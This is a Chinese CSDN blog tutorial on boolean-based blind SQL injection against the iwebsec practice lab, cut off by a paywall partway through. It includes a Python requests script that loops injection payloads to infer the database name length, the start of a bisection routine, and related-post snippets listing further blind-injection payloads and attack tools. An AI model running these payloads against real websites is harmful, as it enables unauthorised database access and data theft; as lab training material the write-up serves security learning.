iwebsec靶场SQL注入-bool盲注

已于 2023-03-24 19:24:57 修改
阅读量295 收藏
点赞数 2
文章标签: 安全 web安全
于 2023-03-24 19:17:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56041380/article/details/129756400
版权

目录

iwebsec靶场在线网站

bool注入

安装requests库

判断注入点

*获取数据库长度(非必要)

*获取数据库名(非必要)

获取当前数据库的列名

获取数据库中的值

脚本全部代码

 

iwebsec靶场在线网站

iwebsec 靶场漏洞库

bool注入

bool注入是盲注的一种。它于报错注入不同,布尔注入没有任何报错信息输出,页面返回只有正常和不正常两种状态,攻击者只能通过返回的这两种状态来对其进行判断输入的SQL注入语句是否正确,从而判断数据库中存储了那些信息。

为了能够看见数据库中存储的信息,我选择的方法是用python编写一个脚本来对其进行输出

我们需要安装requests库

安装requests库

pip install requests

或者直接在pycharm的设置中

 到这里我们需要的准备工作也就完成了

判断注入点

这个是该页面正常的状态

当我们将id=100时发现有一行数据消失了

?id=100

根据这个消失的 welcome to iwebsec!!!我们可以通过这个开始注入

*获取数据库长度(非必要)

代码如下

import requests                          #调用requests库,requests用来发送http请求以及接收http响应的python第三方库
url="http://www.iwebsec.com:81/sqli/03.php"

def SQLlenth():
	for i in range(1,20):                                     #判断字符长度里面的数值可以改动
		payload="?id=1 and (length(database())={})--+".format(i)
		req_url=url+payload                                   #将URL和payload组合
		bool =requests.get(req_url)                         #requests.get返回的是一个Response对象,它包含有关服务器响应的信息,如状态码、响应头和响应内容。可以通过访问对应的属性来获取这些信息。例如,可以使用.status_code来获取响应的状态码,使用.text来获取响应的内容。
		if "welcome to iwebsec!!!" in bool.text:
			print("SQL length is "+str(i))

 从中不难看出数据库的长度为7

*获取数据库名(非必要)

为了获取数据库名,因为是盲注,所以只能进行一个一个的尝试。

这里使用的方法是二分法(后面的代码于这个相似后面就不做备注了),代码如下


def SQLname():
    name&
最低0.47元/天 解锁文章
古木木木木木
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
布尔盲注靶场
weixin_45540609的博客
04-17 316
bool盲注1 一、判断是否存在布尔盲注 二、使用Burp抓包 1、Burp抓包,payload设置1-128,爆破数据库名的长度 url输入如下命令,Burp抓包,设置payload id=1 and ascii(substr(database(),3,1)) =12 intruder attack启动后,抓取不正常的length的数据,如下,对应ascii码表,可得到数据库的表名 107 97 110 119 111 108 111 110 103 120 105 97 ..
[Less-8][sqli靶场]布尔盲注
qq_37301470的博客
11-13 553
Less-8 打开发现只有两种回显 you are in… 和 无回显 正好对应布尔盲注的两个状态 首先判断注入类型(字符,数字) ?id=1 and 1=2 返回了you are in 可是这个逻辑是错的 故而不是数字型 尝试字符型 ?id=-1' or '1' ='2 ?id=1' and '1'='2 判断为字符型 payload i代表爆破的当前位数 j代表所有小写字母 对这两进行遍历 payload:?id=1' and ord(substr((sql),i,1))=ascii(j)
iwebsec靶场 SQL注入漏洞通关笔记10- 双重url编码绕过
mooyuan的博客
11-30 2937
打开靶场,url为id=1如下所示SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第10关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的报错型注入(3)是否过滤了关键字?很明显通过源码,iwebsec的第10关卡过滤了select关键字并且进行了双重url解码了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的双重url解码型注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
SQL注入漏洞-04】布尔盲注靶场实战
cc
02-03 6620
当我们改变前端页面传输给后台sql参数时,页面没有显示相应内容也没有显示报错信息时,不能使用联合查询注入和报错注入,这时我们可以考虑是否为基于布尔盲注。 利用页面返回的布尔类型状态,正常或者不正常; 我们输入的语句让页面呈现出两种状态,相当于true和false,根据这两种状态可以判断我们输入的语句是否查询成功。布尔盲注就是根据这两种状态,来反推我们输入的条件是真还是假。以sqli-labs-masterless-8关为例
墨者靶场 入门:SQL注入漏洞测试(布尔盲注
qq_43233085的博客
01-09 649
入门:SQL注入漏洞测试(布尔盲注) 启动靶场环境,得到测试地址 http://219.153.49.228:44500/ 访问页面,寻找sql注入点,访问注入页面。 http://219.153.49.228:44500/new_list.php?id=1 使用sql注入工具,如sqlmap或穿山甲,进行布尔盲注。 本次使用穿山甲进行注入。 对密码密文进行MD5解码,得到密码明文,解...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
综合bool盲注脚本.py
07-15
可以适用于部分SQL注入题目
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
超级SQL注入工具,支持布尔盲注,报错盲注,union注入等
最新发布
03-27
超级SQL注入工具目前支持Bool盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
to-bool:将类型转换为布尔
05-20
傻瓜将数据类型转换为布尔值。关于这是一个非常基本的实用程序库,可帮助将基本的JS数据类型转换为...用法使用非常简单: var toBool = require("to-bool");if (toBool(someVariable)) {console.log("It's true.");}
[zkaq靶场]SQL注入--布尔盲注
wwxxee
05-08 189
布尔盲注 常用函数 length() 返回字符串长度 substring() substr() mid() 截取字符串: 参数1:字符串 参数2:起始位置,索引从1开始 参数3:截取长度 concat() 不带分隔符链接字符串 concat_ws() 带分隔符链接字符串: concat_ws(’-’,‘a’,‘b’,‘c’) group_concat() 链接一组查询结果字符串 ord() ascii() 返回字符串的ASCII值 left() 从左边开始截取字符串: 参数1:字符串 参数2:截取的长度 l
02#墨者靶场-SQL注入漏洞测试(布尔盲注)
shy的博客
11-15 754
墨者学习 By/shy014 1.进入靶场环境发现后台管理页面,尝试弱口令和万能密码失败,抓包查看登陆处也没有发现注入漏洞。 2.仔细查看该页面,发现一个新的链接,点击跳转,发现可能存在注入...
打穿sqli-labs靶场——Day6 (less-8)手工布尔盲注
qq_45741871的博客
04-18 478
打穿sqli-labs靶场day6——less-8 手工布尔盲注
SQL注入-布尔盲注
qq_65240014的博客
07-26 575
关于sql注入的略微进阶一点的文章,介绍关于bool盲注的方法
iwebsec靶场 SQL注入漏洞通关笔记3- bool注入(布尔盲注
mooyuan的博客
11-26 2617
iwebsec靶场SQL注入漏洞的第03关bool注入漏洞渗透,通过源码再来分析下布尔SQL注入重点内容:(1)闭合方式是什么?iwebsec的第03关关卡为数字型(2)注入类别是什么?这部分通过源码分析与手注很容易判断出是布尔型注入(3)是否过滤了关键字?很明显通过源码,iwebsec布尔型关卡无过滤任何信息了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的第3关bool注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
SQL盲注-实战布尔盲注
dkxkl1314的博客
03-09 2639
环境:win10靶场:sqli-labs-master盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能 回显到前端页面。此时,我们需要利用一些方法进行判断或者尝 试,这个过程称之为盲注。而布尔盲注就是SQL语句执行后,页面 不返回具体数据,数据库只返回0或者1(真or假)。类似于无法开口说话的人,只能通过点头和摇头来告诉你答案的正 确与否。在页面中,如果正确执行了用户构造的SQL语句,则返回一种页 面,如果 SQL语句执行错误,则执行另一种页面。
学习渗透日记3 SQL布尔盲注
qq_56902810的博客
04-25 155
记一次数据库dvwa靶场盲注
渗透测试基础-盲注布尔盲注和时间盲注
weixin_45488495的博客
04-09 4301
渗透测试基础-盲注布尔盲注和时间盲注盲注实现的关键函数布尔盲注靶场演练时间盲注靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 盲注的特点如它的名字那样,它关闭了因恶意语句而导致的报错,也没有了像显错注入那样醒目的提醒。它的提示会很隐晦,就看我们有没有能力能让它显现出来。 布尔盲注和时间盲注 盲注也分布尔盲注和时间盲注,这里分别来了解一下各自的区别 布尔盲注:相较于显错注入,反应会更隐晦,比如当执行的恶意语句条件为Fal
iwebsec sql注入篇(详细过程,完结)
qq_60829702的博客
03-19 2215
iwebsec靶场SQL注入篇,详细过程,全篇完结
超级SQL注入工具V1.1使用详解:渗透测试利器
"超级SQL注入工具(SSQLInjection)是一款高效、全面的SQL注入测试工具,专为渗透测试专家和信息安全专业人士设计。它基于HTTP协议,利用C#开发,通过直接操纵TCP会话进行HTTP交互,提高了发包速度,特别适用于在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值